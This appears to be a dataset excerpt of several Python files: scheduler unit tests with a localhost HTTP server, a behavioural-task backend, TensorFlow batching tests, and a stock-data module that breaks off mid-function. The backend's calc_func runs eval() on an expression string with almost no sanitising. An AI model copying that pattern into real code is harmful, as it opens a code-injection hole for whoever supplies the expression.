source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
---|---|
scheduler_test.py
|
import datetime
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import pdb
import sqlite3
import threading
import time
import unittest
import myDevices.schedule as schedule
from myDevices.cloud.dbmanager import DbManager
from myDevices.cloud.scheduler import SchedulerEngine
from myDevices.utils.logger import debug, error, exception, info, setDebug, setInfo, warn
class TestClient():
def __init__(self):
info('TestClient init')
self.actions_ran = []
def RunAction(self, action):
info('RunAction: ' + action)
self.actions_ran.append(action)
return True
def SendNotification(self, notification):
info('SendNotification: ' + notification)
class TestHandler(BaseHTTPRequestHandler):
def handle_payload(self):
data = self.rfile.read(int(self.headers.get('Content-Length'))).decode('utf-8')
self.server.received.append(json.loads(data))
self.send_response(200)
self.end_headers()
def do_GET(self):
# This should match the payload in test_http_notification
self.server.received.append({'test':'GET request'})
def do_POST(self):
self.handle_payload()
def do_PUT(self):
self.handle_payload()
def do_DELETE(self):
# This should match the payload in test_http_notification
self.server.received.append({'test':'DELETE request'})
class SchedulerTest(unittest.TestCase):
def setUp(self):
self.maxDiff = None
self.test_client = TestClient()
self.test_engine = SchedulerEngine(self.test_client, 'test')
self.schedule_events = []
def tearDown(self):
self.remove_schedules()
self.test_engine.stop()
def add_schedules(self, schedule_events):
for event in schedule_events:
self.test_engine.add_scheduled_event(event, True)
self.schedule_events = self.schedule_events + schedule_events
def remove_schedules(self, engine=None):
scheduled_events = {event['id']:event for event in self.schedule_events if 'id' in event}
for event in scheduled_events.values():
self.assertTrue(self.test_engine.remove_scheduled_event(event))
def check_schedules_added(self, expected):
actual = self.test_engine.get_scheduled_events()
self.assertCountEqual(expected, actual)
def check_schedules_run(self, expected, skip_jobs=()):
print('Pause to allow scheduled events to execute')
expected_to_run = [action for event in expected if event['title'] not in skip_jobs for action in event['actions']]
for i in range(70):
time.sleep(1)
if len(expected_to_run) > 0 and len(expected_to_run) == len(self.test_client.actions_ran):
break
self.assertCountEqual(expected_to_run, self.test_client.actions_ran)
def test_missing_id(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
missing_id_event = {'title':'no_id_job', 'actions':['no_id_job_action'], 'config':{'type':'date', 'start_date':start_date}}
self.assertFalse(self.test_engine.add_scheduled_event(missing_id_event, True))
self.assertFalse(self.test_engine.get_scheduled_events())
def test_overwrite_job(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'overwrite_1', 'title':'overwritten_job', 'actions':['overwritten_job_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'overwrite_1', 'title':'date_job_readd_same_id', 'actions':['date_job_readd_same_id_action'], 'config':{'type':'date', 'start_date':start_date}}]
self.add_schedules(schedule_events)
expected = [event for event in schedule_events if 'id' in event and event['title'] != 'overwritten_job']
self.check_schedules_added(expected)
def test_current_schedules(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
now = datetime.datetime.strftime(datetime.datetime.utcnow(), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'current_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'current_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config': {'type':'interval', 'unit':'day', 'interval':1, 'start_date':start_date}},
{'id':'current_3', 'title':'every_3_days_job', 'actions':['every_3_days_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':3, 'start_date':start_date}},
{'id':'current_4', 'title':'now_date_job', 'actions':['now_date_job_action'], 'config':{'type':'date', 'start_date':now}},
{'id':'current_5', 'title':'weekly_job', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':start_date}},
{'id':'current_6', 'title':'bi-weekly_job', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':2, 'start_date':start_date}},
{'id':'current_7', 'title':'every_4_months_job', 'actions':['every_4_months_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':4, 'start_date':start_date}},
{'id':'current_8', 'title':'every_3_months_job', 'actions':['every_3_months_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':3, 'start_date':now}},
{'id':'current_9', 'title':'hourly_job', 'actions':['hourly_job_action'], 'config': {'type':'interval', 'unit':'hour', 'interval':1, 'start_date':start_date}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events)
def test_past_schedules(self):
next_minute = datetime.datetime.utcnow() + datetime.timedelta(seconds=60)
passed_date = datetime.datetime.strftime(datetime.datetime.utcnow() - datetime.timedelta(seconds=120), '%Y-%m-%dT%H:%M:%S.%fZ')
one_day_ago = datetime.datetime.strftime(next_minute - datetime.timedelta(days=1), '%Y-%m-%dT%H:%M:%S.%fZ')
one_week_ago = datetime.datetime.strftime(next_minute - datetime.timedelta(days=7), '%Y-%m-%dT%H:%M:%S.%fZ')
one_month_ago = datetime.datetime.strftime(schedule.month_delta(next_minute, -1), '%Y-%m-%dT%H:%M:%S.%fZ')
one_year_ago = next_minute.replace(year=next_minute.year-1)
one_year_ago = datetime.datetime.strftime(one_year_ago, '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'past_1', 'title':'expired_date_job', 'actions':['expired_date_job_action'], 'config':{'type':'date', 'start_date':passed_date}},
{'id':'past_2', 'title':'daily_job_started_one_day_ago', 'actions':['daily_job_started_one_day_ago_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':one_day_ago}},
{'id':'past_3', 'title':'monthly_job_started_one_month_ago', 'actions':['monthly_job_started_one_month_ago_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':one_month_ago}},
{'id':'past_4', 'title':'yearly_job_started_one_year_ago', 'actions':['yearly_job_started_one_year_ago_action'], 'config':{'type':'interval', 'unit':'year', 'interval':1, 'start_date':one_year_ago}},
{'id':'past_5', 'title':'every_2_years_job_started_one_year_ago', 'actions':['every_2_years_job_started_one_year_ago_action'], 'config':{'type':'interval', 'unit':'year', 'interval':2, 'start_date':one_year_ago}},
{'id':'past_6', 'title':'weekly_job_started_one_week_ago', 'actions':['weekly_job_started_one_week_ago_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':one_week_ago}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events, ('expired_date_job', 'every_2_years_job_started_one_year_ago'))
def test_future_schedules(self):
one_day_from_now = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(days=1), '%Y-%m-%dT%H:%M:%S.%fZ')
end_of_month = datetime.datetime.strftime(datetime.datetime(2015,1,31), '%Y-%m-%dT%H:%M:%S.%fZ')
future_month = datetime.datetime.strftime(datetime.datetime(2017,12,31), '%Y-%m-%dT%H:%M:%S.%fZ')
future_year = datetime.datetime.strftime(datetime.datetime(2017,1,1), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'future_1', 'title':'daily_job_starts_one_day_from_now', 'actions':['daily_job_starts_one_day_from_now_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':one_day_from_now}},
{'id':'future_2', 'title':'end_of_month_job', 'actions':['end_of_month_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':end_of_month}},
{'id':'future_3', 'title':'future_month_job', 'actions':['future_month_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':future_month}},
{'id':'future_4', 'title':'future_year_job', 'actions':['future_year_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':future_year}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
skip_jobs = [event['title'] for event in schedule_events]
self.check_schedules_run(schedule_events, skip_jobs)
def test_reload(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'reload_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'reload_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':start_date}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events)
self.test_engine.stop()
del self.test_engine
del self.test_client
self.test_client = TestClient()
self.test_engine = SchedulerEngine(self.test_client, 'test')
for event in schedule_events:
if 'last_run' in event:
del event['last_run']
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events, ('date_job', 'daily_job'))
def test_delayed_load(self):
self.test_engine.stop()
del self.test_engine
del self.test_client
now = datetime.datetime.utcnow()
if (now.second > 35):
print('Sleep until the minute rolls over')
time.sleep(60 - now.second)
now = datetime.datetime.strftime(datetime.datetime.utcnow(), '%Y-%m-%dT%H:%M:%S.%fZ')
self.schedule_events = [{'id':'delay_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':now}},
{'id':'delay_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':now}},
{'id':'delay_3', 'title':'weekly_job', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':now}},
{'id':'delay_4', 'title':'monthly_job', 'actions':['monthly_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':now}},
{'id':'delay_5', 'title':'yearly_job', 'actions':['yearly_job_action'], 'config':{'type':'interval', 'unit':'year', 'interval':1, 'start_date':now}}]
for event in self.schedule_events:
event_json = json.dumps(event)
try:
DbManager.Insert('scheduled_events', event['id'], event_json)
except sqlite3.IntegrityError as e:
DbManager.Update('scheduled_events', 'event = ?', event_json, 'id = ?', event['id'])
print('Pause before loading scheduler')
time.sleep(20)
print('Starting scheduler, time is {}'.format(datetime.datetime.utcnow()))
self.test_client = TestClient()
self.test_engine = SchedulerEngine(self.test_client, 'test')
self.check_schedules_run(self.schedule_events)
def test_concurrent_updates(self):
now = datetime.datetime.strftime(datetime.datetime.utcnow(), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'concurrent_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':now}},
{'id':'concurrent_1', 'title':'date_job_updated', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':now}},
{'id':'concurrent_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':now}},
{'id':'concurrent_2', 'title':'daily_job_updated', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':now}},
{'id':'concurrent_3', 'title':'weekly_job', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':now}},
{'id':'concurrent_3', 'title':'weekly_job_updated', 'actions':['weekly_job_action'], 'config':{'type':'interval', 'unit':'week', 'interval':1, 'start_date':now}},
{'id':'concurrent_4', 'title':'monthly_job', 'actions':['monthly_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':now}},
{'id':'concurrent_4', 'title':'monthly_job_updated', 'actions':['monthly_job_action'], 'config':{'type':'interval', 'unit':'month', 'interval':1, 'start_date':now}},
{'id':'concurrent_5', 'title':'yearly_job', 'actions':['yearly_job_action'], 'config':{'type':'interval', 'unit':'year', 'interval':1, 'start_date':now}},
{'id':'concurrent_5', 'title':'yearly_job_updated', 'actions':['yearly_job_action'], 'config':{'type':'interval', 'unit':'year', 'interval':1, 'start_date':now}}]
for event in schedule_events:
threading.Thread(target=self.add_schedules, daemon=True, args=([event],)).start()
#Only half the schedule_events should run since ones with the same id will overwrite previously added ones. Since we don't know what order that will take
#we just make sure we only check that one of each action has run.
run_events = {event['id']:event for event in schedule_events if 'id' in event}
skip_jobs = [event['title'] for event in run_events.values()]
self.check_schedules_run(schedule_events, skip_jobs)
def test_update_schedules(self):
start_date = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=60), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'update_1', 'title':'date_job', 'actions':['date_job_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'update_2', 'title':'daily_job', 'actions':['daily_job_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':start_date}}]
self.add_schedules(schedule_events)
update_schedule_events = [{'id':'update_3', 'title':'date_job_full_update', 'actions':['date_job_full_update_action'], 'config':{'type':'date', 'start_date':start_date}},
{'id':'update_4', 'title':'daily_job_full_update', 'actions':['daily_job_full_update_action'], 'config':{'type':'interval', 'unit':'day', 'interval':1, 'start_date':start_date}}]
self.assertTrue(self.test_engine.update_scheduled_events(update_schedule_events))
self.schedule_events = update_schedule_events
self.check_schedules_run(update_schedule_events)
def start_http_server(self):
self.server = HTTPServer(('localhost', 8000), TestHandler)
self.server.received = []
self.server.serve_forever()
def test_http_notification(self):
threading.Thread(target=self.start_http_server, daemon=True).start()
now = datetime.datetime.strftime(datetime.datetime.utcnow(), '%Y-%m-%dT%H:%M:%S.%fZ')
schedule_events = [{'id':'http_1', 'title':'date_get_job', 'actions':['date_job_action'],
'http_push':{'url':'http://localhost:8000', 'method':'GET', 'headers':{'Content-Type':'application/json'}, 'payload':{'test': 'GET request'}},
'config':{'type':'date', 'start_date':now}},
{'id':'http_2', 'title':'date_post_job', 'actions':['date_job_action'],
'http_push':{'url':'http://localhost:8000', 'method':'POST', 'headers':{'Content-Type':'application/json'}, 'payload':{'test': 'POST request'}},
'config':{'type':'date', 'start_date':now}},
{'id':'http_3', 'title':'date_put_job', 'actions':['date_job_action'],
'http_push':{'url':'http://localhost:8000', 'method':'PUT', 'headers':{'Content-Type':'application/json'}, 'payload':{'test': 'PUT request'}},
'config':{'type':'date', 'start_date':now}},
{'id':'http_4', 'title':'date_delete_job', 'actions':['date_job_action'],
'http_push':{'url':'http://localhost:8000', 'method':'DELETE', 'headers':{'Content-Type':'application/json'}, 'payload':{'test': 'DELETE request'}},
'config':{'type':'date', 'start_date':now}}]
self.add_schedules(schedule_events)
self.check_schedules_added(schedule_events)
self.check_schedules_run(schedule_events)
self.assertEqual(4, len(self.server.received))
expected = [event['http_push']['payload'] for event in schedule_events]
self.assertCountEqual(expected, self.server.received)
if __name__ == '__main__':
# setDebug()
setInfo()
unittest.main()
# test_suite = unittest.TestSuite()
# # test_suite.addTest(SchedulerTest('test_current_schedules'))
# # test_suite.addTest(SchedulerTest('test_future_schedules'))
# test_suite.addTest(SchedulerTest('test_reload'))
# # test_suite.addTest(SchedulerTest('test_delayed_load'))
# # test_suite.addTest(SchedulerTest('test_http_notification'))
# unittest.TextTestRunner().run(test_suite)
|
backend.py
|
import time
import pandas as pd
import multiprocessing
from task_queue import TaskQueue
import autoshape.autoshape as autoshape
import fixed_ratio.fixed_ratio as fixed_ratio
import fixed_interval.fixed_interval as fixed_interval
from re import sub
# TODO: import other tasks
class Backend:
""" backend functions"""
# TODO: add other tasks to self.tasks
def __init__(self):
self.tasks = {
'autoshape': autoshape,
'fixed_ratio': fixed_ratio,
'fixed_interval': fixed_interval,
}
self.task_queue = TaskQueue(50)
@staticmethod
def read_params():
"""
Reads parameters from parameters.csv
:return: parameters in dictionary and dataframe format
"""
params_df = pd.read_csv('parameters.csv')
params_dict = params_df.to_dict(orient='list')
for key in params_dict.keys():
params_dict[key] = params_dict[key][0]
return params_dict, params_df
@staticmethod
def set_params(params_df: pd.DataFrame):
"""
Writes new parameters to parameters.csv
:param params_df: New parameters dataframe
:return: None
"""
params_df.to_csv('parameters.csv', index=None)
@staticmethod
def read_output(name):
"""
Reads the output of a specified task
:param name: name of task
:return: output in dictionary and dataframe formats
"""
output_df = pd.read_csv(name + '/output.csv')
output_dict = output_df.to_dict(orient='list')
for key in output_dict.keys():
output_dict[key] = output_dict[key][0]
return output_dict, output_df
def start_task(self, params=None):
"""
Starts task specified by parameters
"""
if not params:
params = self.read_params()[0]
name = params['schedule']
length = params['session_length']
proc = multiprocessing.Process(target=self.task_process, name='task_process', args=(name, params,))
proc.start()
print(f'Task timer started: {length} seconds remaining.')
time.sleep(length)
if proc.is_alive():
print(f'Terminating task. {length} seconds elapsed.')
proc.terminate()
proc.join()
print('Task completed.')
return True
def task_process(self, name: str, params: pd.DataFrame):
"""
Helper method for start_task
"""
self.tasks[name].main(params)
def enqueue_task(self):
"""
enqueues task specified by parameters
"""
params = self.read_params()[0]
if self.task_queue.enqueue(params):
return True
else:
return False
def start_queue(self):
"""
Starts task Queue
"""
for i in range(self.task_queue.size):
self.start_task(params=self.task_queue.dequeue())
return True
def get_queue_size(self):
"""
return: current size of task queue
"""
return self.task_queue.size
@staticmethod
def calc_func(func: str, x: int):
# regex to clean up math expression
func = sub(r'(\d+|x)(x)', r'\1*\2', func)
# returns evaluated python result
return int(eval(func))
|
batch_ops_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the currently experimental in-graph batch ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from tensorflow.contrib.batching.python.ops import batch_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import script_ops
from tensorflow.python.platform import test
def delayed_plus1(x):
"""Sleeps for 100ms then returns x+1."""
time.sleep(0.1)
return x + 1
class BatchOpsTest(test.TestCase):
"""Tests for batch_ops.{un,}batch."""
def testBasicBatch(self):
"""Tests that a single batched tensor executes together and only once."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, index, _ = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=2,
batch_timeout_micros=36000000, grad_timeout_micros=0,
batching_queue="")
thread_results = []
def worker():
thread_results.extend(
sess.run([batched, index], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([batched, index], feed_dict={inp: [2]})
worker_thread.join()
# At this point either the thread or the main did the batch and the other
# should have empty results.
if list(thread_results[0][0]):
batch_t = thread_results[0][0]
index_t = thread_results[1]
empty_b = main_results[0][0]
empty_m = main_results[1]
else:
batch_t = main_results[0][0]
index_t = main_results[1]
empty_b = thread_results[0][0]
empty_m = thread_results[1]
# Check that both the inputs made it out exactly once.
self.assertAllEqual(sorted(batch_t), (1, 2))
# Check that we get 2 rows in the index tensor.
self.assertEqual(len(index_t), 2)
# Check that the other ones are empty.
self.assertEqual(len(empty_b), 0)
self.assertEqual(len(empty_m), 0)
def testBatchWithPadding(self):
"""Test that batching with padding up to an allowed batch size works."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[2])
batched, index, _ = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=10,
batch_timeout_micros=100000, # 100ms
allowed_batch_sizes=[5, 10],
grad_timeout_micros=0, batching_queue="")
thread_results = []
def worker():
thread_results.extend(
sess.run([batched, index], feed_dict={inp: [1, 3]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([batched, index], feed_dict={inp: [2, 4]})
worker_thread.join()
# At this point either the thread or the main did the batch and the other
# should have empty results.
if list(thread_results[0][0]):
batch_t = thread_results[0][0]
else:
batch_t = main_results[0][0]
# Check that the batch tensor incorporates the padding.
self.assertEqual(len(batch_t), 5)
def testMultipleBatch(self):
"""Tests that multiple batched tensors execute together."""
with self.test_session() as sess:
inp0 = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
inp1 = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, _, _ = batch_ops.batch(
[inp0, inp1],
num_batch_threads=1,
max_batch_size=2,
batch_timeout_micros=36000000,
grad_timeout_micros=0,
batching_queue="")
thread_results = []
def worker():
thread_results.extend(
sess.run([batched], feed_dict={inp0: [1],
inp1: [2]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([batched], feed_dict={inp0: [2], inp1: [3]})
worker_thread.join()
# At this point either the thread or the main did the batch and the other
# should have empty results.
if list(thread_results[0][0]):
batch_t = thread_results[0]
empty_t = main_results[0]
else:
batch_t = main_results[0]
empty_t = thread_results[0]
# Assert that the tensors were batched together.
self.assertAllEqual(sorted(batch_t[0]), [1, 2])
self.assertAllEqual(sorted(batch_t[1]), [2, 3])
self.assertAllEqual(empty_t[0], [])
self.assertAllEqual(empty_t[1], [])
def testIllegalBatchDifferentDim0Sizes(self):
"""Tests illegally feeding tensors with different dim0 sizes."""
with self.test_session() as sess:
inp0 = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
inp1 = array_ops.placeholder(dtype=dtypes.int32, shape=[2])
batched, index, _ = batch_ops.batch(
[inp0, inp1], num_batch_threads=1, max_batch_size=2,
batch_timeout_micros=0, grad_timeout_micros=0, batching_queue="")
with self.assertRaises(Exception) as raised:
_ = sess.run([batched, index], feed_dict={inp0: [0], inp1: [1, 2]})
self.assertGreater(
raised.exception.message.find("must have equal 0th-dimension size"),
0)
def testBasicUnbatch(self):
"""Tests that batch and unbatch work together."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, index, id_t = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=10,
batch_timeout_micros=100000, # 100ms
allowed_batch_sizes=[3, 10],
grad_timeout_micros=0, batching_queue="")
computation = batched[0] + 1
result = batch_ops.unbatch(computation, index, id_t,
timeout_micros=1000000, shared_name="unbatch")
thread_results = []
def worker():
thread_results.extend(sess.run([result], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([result], feed_dict={inp: [2]})
worker_thread.join()
self.assertEqual(thread_results[0], [2])
self.assertEqual(main_results[0], [3])
def testBasicUnbatchDecorated(self):
"""Tests that the batch_function decorator works."""
with self.test_session() as sess:
@batch_ops.batch_function(1, 10, 100000)
def computation(in_t):
return in_t + 1
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
result = computation(inp)
thread_results = []
def worker():
thread_results.extend(sess.run([result], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([result], feed_dict={inp: [2]})
worker_thread.join()
self.assertEqual(thread_results[0], [2])
self.assertEqual(main_results[0], [3])
def testUnbatchTimeout(self):
"""Tests that the unbatch timeout works."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, index, id_t = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=2,
batch_timeout_micros=36000000, grad_timeout_micros=0,
batching_queue="")
computation = batched[0] + 1
timeout_micros = 10
result = batch_ops.unbatch(computation, index, id_t, timeout_micros,
shared_name="shared_unbatch")
# Set up a parallel pipeline that delays the computation, but uses the
# same unbatch resource object as the non-delayed pipeline.
computation_delayed = script_ops.py_func(delayed_plus1,
[batched[0]],
dtypes.int32)
result_delayed = batch_ops.unbatch(computation_delayed,
index,
id_t,
timeout_micros,
shared_name="shared_unbatch")
thread_results = []
def worker():
# A first call using the non-delayed pipeline. The batcher will send an
# empty tensor along the non-delayed pipeline.
thread_results.extend(sess.run([result], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
time.sleep(0.1) # Ensure the thread's call starts first.
# A second call using the delayed pipeline. The batcher will send the
# batched tensor along the delayed pipeline, thus delaying the arrival of
# the batched tensor at the unbatch op, relative to the empty tensor.
#
# TODO(olston, apassos): Avoid relying on the order in which the batch op
# emits the empty tensor versus the batched one.
_ = sess.run([result_delayed], feed_dict={inp: [2]})
worker_thread.join()
# The thread's call should hit the timeout, and thus get 0 results.
self.assertEqual(len(thread_results), 0)
def testUnbatchGrad(self):
"""Tests that batch and unbatch are differentiable."""
with self.test_session() as sess:
inp = array_ops.placeholder(dtype=dtypes.int32, shape=[1])
batched, index, id_t = batch_ops.batch(
[inp], num_batch_threads=1, max_batch_size=2,
batch_timeout_micros=36000000, grad_timeout_micros=1000000,
batching_queue="")
computation = batched[0] * batched[0]
result = batch_ops.unbatch(computation, index, id_t,
timeout_micros=1000000, shared_name="unbatch")
grad = gradients_impl.gradients(result, inp)
thread_results = []
def worker():
thread_results.extend(sess.run([grad], feed_dict={inp: [1]}))
worker_thread = threading.Thread(target=worker)
worker_thread.start()
main_results = sess.run([grad], feed_dict={inp: [2]})
worker_thread.join()
self.assertEqual(thread_results[0], [2])
self.assertEqual(main_results[0], [4])
if __name__ == "__main__":
test.main()
|
DataBaseModule.py
|
import tushare as ts
#import os
import pandas as pd
#import time
#import threading
import datetime as dtime
class DataBase:
updateAllShareHistoryDataSum = 0
updateAllShareHistoryDataCount = 0
indexNameMap = {'hs300':399300}
store = None
"""===============================公有函数========================="""
"""
获得沪深300成份股的列表,以权重降序排序
"""
def get_hs300_sharelist(self):
return self.store["hs300_share_list"]
"""
更新所有的股票信息
"""
def update_all_share_history_data(self):
self.__log("update all share history data");
self.__update_share_list_from_internet()
data = self.get_share_list_form_local()
#剔除所有未上市股票
data = data[data.timeToMarket != 0]
dataCodes = list(data.index)
for key in self.indexNameMap:
#print(self.indexNameMap[key])
dataCodes.append(self.indexNameMap[key])
#print(dataCodes)
self.updateAllShareHistoryDataSum = len(dataCodes)
#data1 = dataCodes[0:int(self.updateAllShareHistoryDataSum/2)]
#data2 = dataCodes[int(self.updateAllShareHistoryDataSum/2):]
#threading.Thread(target=self.__update_share_history_data_by_codes,args=([data1])).start()
#threading.Thread(target=self.__update_share_history_data_by_codes,args=([data2])).start()
self.__update_share_history_data_by_codes(dataCodes)
"""
获取个股信息,如果有本地数据,先拿本地数据,如果没有本地数据,先更新,再拿本地数据
"""
def get_share_history_data(self,code,startDate=None,endDate=None):
data = self.store.select('share_'+str(code))
if not isinstance(data,pd.DataFrame):
return None
#data = data.iloc[::-1]
data.index = data.date
if startDate is None and endDate is None:
return data
elif startDate is not None and endDate is None:
return data[startDate:startDate]
else:
return data[startDate:endDate]
"""
if startDate is None and endDate is None:
data = self.store.select('share_'+str(code))
data = data.iloc[::-1]
data.index = data.date
if not isinstance(data,pd.DataFrame):
return None
else:
return data
else:
topData = self.store.select('share_'+str(code),start=0,stop=1)
print(topData)
"""
def debug_get_share_history_data(self,code,startDate=None,endDate=None):
try:
if startDate is None and endDate is None:
data = self.store.select('share_'+str(code))
data = data.iloc[::-1]
data.index = data.date
if not isinstance(data,pd.DataFrame):
return None
else:
return data
else:
topData = self.store.select('share_'+str(code),start=0,stop=1)
print(topData)
"""
if topData.empty:
print("start data is emmpty code="+str(code))
return None
topDateStr = topData.index[0]
topDateObj = dtime.datetime.strptime(topDateStr,"%Y-%m-%d")
startDateObj = dtime.datetime.strptime(startDate,"%Y-%m-%d")
del_time = topDateObj - startDateObj
if del_time.days <=0:
start = 0
else:
start = int(del_time.days*0.5)
if endDate is None:
stop = start+10
else:
endDateObj = dtime.datetime.strptime(endDate,"%Y-%m-%d")
del_time2 = startDateObj - endDateObj
stop = int(del_time2.days+3)+start
#print(start)
#print(stop)
data = self.store.select('share_'+str(code),start=start,stop=stop)
if not isinstance(data,pd.DataFrame):
print("data is not dataframe code="+str(code)+" ["+str(start)+" "+str(stop)+"]")
return None
else:
#print(data)
if endDate is None:
ret_data = data.loc[startDate:startDate]
else:
ret_data = data.loc[startDate:endDate]
if ret_data is None or ret_data.empty:
print("DataBase is None or empty"+" code="+str(code)+" ["+startDate+" "+endDate+"]")
return ret_data
"""
except Exception as e:
print(" get_share_history_data except code="+str(code)+" e="+str(e))
return None
"""
获取沪深300指数信息
"""
def get_hs300_data(self):
return self.get_share_history_data(self.indexNameMap['hs300'])
"""
更新个股信息
"""
def update_share_history_data(self,codestr):
code = self.__formtInputCode(codestr)
self.__log("update data from internet code="+code)
data = ts.get_k_data(code)
if isinstance(data,pd.DataFrame) and not data.empty:
self.store['share_'+code] = data
else:
self.store['share_'+code] = pd.DataFrame()
self.__log("update data from internet code="+code+" but not get data")
"""
得到股票名称,代码,等信息列表
"""
def get_share_list_form_local(self):
return self.store['all_share_list']
def update_all_report_data(self):
timeset = self.__get_Q_list()
for time in timeset:
self.__update_report_data(time[0],time[1])
def update_all(self):
self.__update_hs300_sharelist()
self.update_all_share_history_data()
self.store.close()
"""==================================私有函数============================"""
def __date_to_q(self,date):
tmp = date.split('-')
q = 1
if tmp[1] in ['01','02','03']:
q = 1
elif tmp[1] in ['04','05','06']:
q = 2
elif tmp[1] in ['07','08','09']:
q = 3
else:
q = 4
return (int(tmp[0]),q)
def __get_Q_list(self):
now = dtime.datetime.now()
deltalist = [dtime.timedelta(days=-x*30) for x in range(36)]
n_days = [ now + delta for delta in deltalist]
time_list = [ x.strftime('%Y-%m') for x in n_days ]
q_list = [self.__date_to_q(x) for x in time_list]
return set(q_list)
def __update_report_data(self,year,index):
try:
data1 = ts.get_report_data(year,index)
data2 = ts.get_profit_data(year,index)
data3 = ts.get_operation_data(year,index)
data4 = ts.get_growth_data(year,index)
data5 = ts.get_debtpaying_data(year,index)
data6 = ts.get_cashflow_data(year,index)
self.store['report_data_'+str(year)+'_'+str(index)] = data1
